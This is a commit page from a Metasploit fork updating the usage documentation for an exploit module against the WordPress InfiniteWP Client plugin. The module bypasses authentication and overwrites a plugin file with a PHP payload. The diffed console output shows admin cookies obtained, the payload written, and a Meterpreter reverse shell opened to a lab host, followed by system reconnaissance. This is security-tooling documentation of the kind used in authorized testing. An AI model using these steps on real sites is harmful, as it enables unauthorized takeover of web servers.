adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Restore the original PLUGIN_FILE contents

Browse Source
This commit is contained in:
William Vu
2020-01-18 13:51:54 -06:00
parent cbd949927d
commit 972cb545f0
4 changed files with 103 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md
+36 -9
View File
@@ -2,7 +2,14 @@
This module exploits an authentication bypass in the WordPress
InfiniteWP Client plugin to log in as an administrator and execute
arbitrary PHP code. A valid administrator username is required.
arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
The module will attempt to retrieve the original `PLUGIN_FILE` contents
and restore them after payload execution. If `VerifyContents` is set,
which is the default setting, the module will check to see if the
restored contents match the original.
Note that a valid administrator username is required for this module.
## Setup
@@ -19,11 +26,22 @@ Id Name
## Options
**USERNAME**
Set this to a known, valid administrator username. Authentication will
be bypassed for this user.
**PLUGIN_FILE**
Set this to a plugin file to insert the payload into, relative to the
plugins directory, which is normally `/wp-content/plugins`. The file
must exist and be writable by the web user. It will be overwritten.
must exist and be writable by the web user. It will be overwritten and
later restored.
**VerifyContents**
Verify that the restored contents of `PLUGIN_FILE` match the original.
This is the default setting.
## Usage
@@ -34,20 +52,29 @@ msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
[*] Found version 1.9.4.4 in the custom file
[*] Bypassing auth for admin at http://127.0.0.1:8080/
[+] Successfully obtained cookie for admin
[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C16a01e62816ac417c021215bd344ec9fa7a8ff49125f949019fdc89623131ef5; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CINVpiM6qkCHdJYwQ6NacqF266nGBG7I9sRz9jgeSYMl%7C9c1dd6506b08207bd81ee38a4cf7c9a0260ff7bbf4aec52d1a8ebd32a4d2f47e; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C7b6635d34187a7f931e9e101cf6868916329730829ece06be5a9d12ad9fc94f3; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579485087%7CG6fm34loHaQrpkXc8eFGFcGXdaagX1MetNPuZM4cgGr%7C9a91c6c80d74d0836ed69e55de3aab4a13e003f2004a982c0997cc46b8b80226;
[*] Editing payload into /wp-content/plugins/index.php
[*] Acquired a plugin edit nonce: 8586e26cd9
[*] Cookie: wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C52db8d17e2e078af4cc32f7c50a36114c2c325c031f3e10dc7bea303c7dba604; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7COxBLq33okE0wpLhPExpGTmYwiVFKf9lxPMikSWH9Gzf%7C44ecac44335ad633ea98045a7085c4947fee015b700b8b7d9463dd44d2388bb2; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_sec_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C9dfc5a01eb1df39b91ec09823e0b44e9a36490a096f5205dc2209664f689bdc9; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=admin%7C1579553438%7C1h94K6uHKvFtqDB7jrIthpauRgc3eavVak6DVOjAHn3%7C240d956e7a43f2ed3193171df429c8a8fb9ba3bac2f9805cdf88789f90a186df;
[*] Retrieving original contents of /wp-content/plugins/index.php
[+] Successfully retrieved original contents of /wp-content/plugins/index.php
[*] Contents:
<?php
// Silence is golden.
[*] Overwriting /wp-content/plugins/index.php with payload
[*] Acquired a plugin edit nonce: 9901ed8f55
[*] Edited plugin file index.php
[+] Successfully edited payload into /wp-content/plugins/index.php
[+] Successfully overwrote /wp-content/plugins/index.php with payload
[*] Requesting payload at /wp-content/plugins/index.php
[*] Restoring original contents of /wp-content/plugins/index.php
[*] Sending stage (38288 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:49273) at 2020-01-17 19:51:27 -0600
[*] Acquired a plugin edit nonce: 9901ed8f55
[*] Edited plugin file index.php
[+] Current contents of /wp-content/plugins/index.php match original!
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58534) at 2020-01-18 14:50:39 -0600
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : 4d173f97f00b
OS : Linux 4d173f97f00b 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
Computer : 4e8791809581
OS : Linux 4e8791809581 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```